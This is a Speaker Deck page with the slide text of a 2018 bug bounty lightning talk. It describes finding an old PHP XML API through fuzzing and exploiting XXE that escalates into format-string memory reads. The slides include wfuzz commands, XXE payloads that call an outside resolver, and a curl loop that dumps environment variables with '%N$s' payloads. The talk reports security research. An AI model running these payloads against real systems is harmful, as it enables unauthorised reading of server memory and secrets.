Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web based format injection, dumping memory like...
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Frans Rosén
September 19, 2018
Research
230
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Web based format injection, dumping memory like it's 99 (or "Please help")
My lightning talk from Sec-T Stockholm in September 2018.
Frans Rosén
September 19, 2018
More Decks by Frans Rosén
See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
2.1k
Story of a RCE on Apple through hot jar swapping
fransrosen
0
1.4k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
460
A methodology using fuzzing and info disclosure
fransrosen
0
550
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
9.8k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
8.7k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
7.9k
Other Decks in Research
See All in Research
正規分布と最適化について
koide3
1
300
重要だけど測れていないもの:高齢者ケアの見えない課題
theoriatec2024
0
400
Visual SLAM未来予測 / Future Prediction in Visual SLAM
koide3
1
610
Data Visualization Tools in the Age of AI
flekschas
0
170
Sequences of Logits Reveal the Low Rank Structure of Language Models
sansantech
PRO
1
280
「AIとWhyを深堀る」をAIと深堀る
iflection
0
520
言語モデルから言語について語る際に押さえておきたいこと
eumesy
PRO
6
2.5k
2026 東京科学大 情報通信系 研究室紹介 (すずかけ台)
icttitech
0
4.1k
LLM の Attention 機構まとめ — 数式・計算量・メモリ
puwaer
8
2.2k
Φ-Sat-2のAutoEncoderによる情報圧縮系論文
satai
4
850
AGI4OPT:自然言語から数理最適化を導くエ ージェントスキル Translating Human Intent into Mathematical Optimization
mickey_kubo
0
150
論文紹介:HalluCitation Matters
wasyro
0
120
Featured
See All Featured
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
31
2.8k
Practical Orchestrator
shlominoach
191
11k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
10
1.2k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
130k
AI: The stuff that nobody shows you
jnunemaker
PRO
8
820
Avoiding the “Bad Training, Faster” Trap in the Age of AI
tmiket
0
190
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
35
2.5k
The Illustrated Children's Guide to Kubernetes
chrisshort
51
52k
The Impact of AI in SEO - AI Overviews June 2024 Edition
aleyda
5
1.1k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
35
3.6k
30 Presentation Tips
portentint
PRO
1
350
Building Applications with DynamoDB
mza
96
7.1k
Transcript
@fransrosen Web based format injection, dumping memory like it's 99
or "Please help"
@fransrosen Public Bug Bounty
@fransrosen RCE is 30,000 USD
@fransrosen Methodology • Found a domain not like the other
ones
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting
path: /cgi-bin/default/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen xml_api?
@fransrosen xml_api?
@fransrosen xml_api? YEAH! 👍
@fransrosen wtf!?
@fransrosen XXE!
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???
@fransrosen
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.
@fransrosen Format String Injection?
@fransrosen Format String Injection ON ZE WEB?
@fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen I can’t handle this shit
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Limitations 0x20-0xFF (no 0x22)
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Want to collaborate? @fransrosen
@fransrosen Questions? Suggestions?